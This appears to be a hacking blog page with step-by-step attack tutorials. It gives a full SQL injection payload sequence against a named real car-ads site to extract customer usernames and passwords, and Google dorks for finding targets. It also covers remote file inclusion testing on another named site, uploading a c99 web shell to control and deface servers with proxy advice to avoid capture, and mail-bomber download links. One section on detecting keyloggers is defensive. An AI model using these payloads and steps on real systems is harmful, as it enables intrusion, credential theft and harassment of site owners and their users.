Website hacking

hacking a website in ten steps

My this Section will include how to actually hack a website.

Step 1

to find a website with the url ending with

.php?id=4383

where 4383 can be any number . Now in google i have some tricks where you can actually look for some sites ending with this tag.
use these following commands in google .

inurl:shop.php?id=
inurl:shopping.php?id=
inurl:sell.php?id=

Now once you get any website with this url , open that website . For demonstration i am taking a website

http://pkmotors.com/ads_detail.php?nAddsID=17156%27

Step 2

Add ‘ after id=****
Now, if u are getting an error or a blank page after addition of ‘ then site is accepting sql commands from address bar of browser , which means site is vulnerable to sql injection.

http://pkmotors.com/ads_detail.php?nAddsID=17156%27′

Step 3

Now next step is to find out number of vulnerable links
example – id=43434′ order by 1 –
check the number of vulnurable links by putting values 1,2,3,4 etc.. till wich the page does not gives error.

http://pkmotors.com/ads_detail.php?nAddsID=17156%27 order by 1 / order by 2 / etc until it comes blank

Step 4

Find out names of tables and columns

http://pkmotors.com/ads_detail.php?nAddsID=-17156%27 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 –

Step 5

Now what next we have to do is
replace the upper link with -17156′ union all select table_name,*,*,*,* from information_schema.tables –

http://pkmotors.com/ads_detail.php?nAddsID=-17156%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,table_name%20from%20information_schema.tables%20–

Step 6

here group concat will give the details of all the tables in the database of the website

http://pkmotors.com/ads_detail.php?nAddsID=-17156%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,group_concat%28table_name%29%20from%20information_schema.tables%20%20–

Step 7

But since we are hacker :p , we are always interested in one table and that is the admin table so , look out for admin table in the list of displayed table names. Now here we chose the customer table because this is a shopping website and we want to shop from a user’s account so we will search for columns in the customer table by the following commands below

http://pkmotors.com/ads_detail.php?nAddsID=-17156%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,group_concat%28column_name%29%20from%20information_schema.columns%20where%20table_name=%27customer%27%20–

Step 8

same extracting information of every column of that table via group concat

http://pkmotors.com/ads_detail.php?nAddsID=-17156%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,group_concat%28column_name%29%20from%20information_schema.columns%20where%20table_name=char%2899,117,115,116,111,109,101,114%29%20–

Step 9

Now we get two column fields after executing the upper commands , that is
strUsername
strPassword

Now the limit fun. below will search for the username of the particular person with the id=1684
// here %20 in the url is not any command , it comes automatically once we execute our commands on the browser

http://pkmotors.com/ads_detail.php?nAddsID=-17156%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,strUsername%20from%20customer%20limit%201684,1%20–

Step 10

we finally got the username of the person and now we will look for the password of that person typing the same command and replacing strPassword with strUsername.

http://pkmotors.com/ads_detail.php?nAddsID=-17156%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,strPassword%20from%20customer%20limit%201684,1%20–

Finally you have the username and the password of the person of your wish , now do what ever you want to do )

NOTE : These all steps of Hacking are just meant to teach how sql Injection can be done, no illegal work should be done from the above skills.

How to detect that a keylogger is installed on a computer or not

Key loggers are software that traces the key strokes on your computer.NOW a days key loggers are mainly used for hacking.So it is IMPORTANT to protect your data from keylogger. It is done in such a way that a person using the computer is unaware of the fact that a key logger is installed on a particular PC.

How does  keyloggers enters your computer ?

There are several ways in which a key logger 

can get into your computer either it is directly installed or it is indirectly transferred to your computer. Most of the time, this malicious file enters a computer when the user downloads an infected application like movies, music or other software applications.

So how to get rid of  keyloggers that is installed on a computer

1. Use updated antivirus and anti spyware

Some of the good anti viruses have capability to detect key loggers. So you should update your antiviruses regularly so that it gets updated for new keyloggers.

2. Use Anti keyloggers

There are anti keyloggers available that will make the task easy for you in finding a keyloggers. Use these softwares if you think there is a high possibility of keyloggers on a computer. The anti keyloggers that i will suggest you is Cyberhawk. Even  Kasperky does a good job in this area too. Also check anti-spy.info. More examples:

·                                http://www.microsoft.com/athome/security/spyware/software/default.mspx

·                                 http://www.lavasoftusa.com/software/adaware/

·                                 http://security.kolla.de/

·                                 http://www.clamwin.com

3. Search for keyloggers yourself

Keyloggers have the capability that they hide them self from the user but are active in the background. There are some shortcuts that are used to see them live on screen

For example : Ctrl + Alt + X or Ctrl + Alt + Wondows Key + X or desktopshark  etc.

4. Use special tools

KL-Detector
Freeware on demand keylogger scanner.

SnoopFree
Freeware antikeylogger that block hook based keyloggers as well as screen captures.For Windows XP.

PSMAntiKeyLogger
PSMAntiKeyLogger is a real-time protecting software which protects you against Keyloggers. No scanning is needed.

I Hate Keyloggers
Freeware antikeylogger that block hook based keyloggers. For Windows 2000 and XP.

Mail bomber

EMAIL BOMBER WITH LINKS:-

 

http://www.ziddu.com/download/7051520/DarkMailBomberV2.0.rar.htm 

password -hackingguide

 and need all bomber so download here;

http://www.filecrop.com/mail-bomber-hack.html

Hacking a Website Using Remote File Inclusion

Remote file inclusion is basically a one of the most common vulnerability found in web application. This type of vulnerability allows the Hacker or attacker to add a remote file on the web server. If the attacker gets successful in performing the attack he/she will gain access to the web server and hence can execute any command on it.

Searching the Vulnerability

Remote File inclusion vulnerability is usually occurred in those sites which have a navigation similar to the below one

www.Targetsite.com/index.php?page=Anything

To find the vulnerability the hacker will most commonly  use the following Google Dork

“inurl:index.php?page=”

This will show all the pages which has “index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker use the following command

www.Victimsite.com/index.php?page=www.google.com

Lets say that the target website is http://www.cbspk.com

So the hacker url will become

http://www.cbspk.com/v2/index.php?page=http://www.google.com

If after executing the command the homepage of the google shows up then then the website isvulnerable to this attack if it does not come up then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack.

Ethical Hacking!!How to Deface a website Completely…

You can hack a certain site using C99.php shell by uploading it to web server. Unfortunately I cannot post the source code of c99 shell here but I will provide tips on how to find c99 shell script. The c99.php is detected as harmful to your pc scanned by various anti-virus but basically it doesn’t harm your pc anyway, it’s just a hack script which is applicable only to web server running Php under Linux platform or maybe on Windows server (haven’t tried yet) but 99% works on Linux servers.

You can find c99 shell using Google by using a ‘Google Dork’, just type [allinurl: c99.php"] without the brackets Google will provide your results which links to c99.php shell. I advise that you copy the c99.php code and save it as “c99.php” and upload it to web host. To be able to use the c99 shell script just access it via URL (i.e. www.somesite.com/c99.php) or similar to this and voila! You can retrieve/modify password, upload file, modify, etc..

But before you access the file make sure you have your proxy setup to avoid getting caught. It is unwise to access directly the exploit without protecting yourself first!

Hack web server using C99 script

Hack a website using c99 script

The c99 shell script is a very good way to hack a php enable web server. You have to find an unsecure uploader to upload this file to the server. Here i used unsecure uploader means the uploader which can't check for file extension and allow us to upload our executable scripts to the server.


This c99 shell allows an attacker to hijack the php enable web server. This script is very user friendly and having very good interface so it is easy to use. You can issue any php command to run on the web server. You can use any of the commands given in the script to run on the web server.


NOTE: This post is only for educational purpose. We advice you not to try this on any website. Use of this script on any website is illegal. 



For hacking a website using C99 script follow these steps.


1) Find a php web site with an uploader.
2) Test the file uploader to be secure or not by uploading files with a server executable extension.
3) If uploader is unsecure then upload the shell script.
4) Execute the uploaded code by navigating to the uploaded page.
5) A c99 script GUI will show up with a lot of options and details.
6) Look for the server details if the safe mode is on or off. If safe mode is off then the entire web server can be controlled by the script. If its on then on the directory in which c99 shell script is uploaded can only be controlled by the script.
7) Apart from being able to chmod, modify and delete files c99 also lets its user brute force the ftp but it requires an additional dictionary file which can run into hundreds of MBs.


NOTE: You can also execute this script on the web server by RFI


Search the and download the script from google.  or download from link
c99
but upper link may not work because script will soon be deleted by the file host.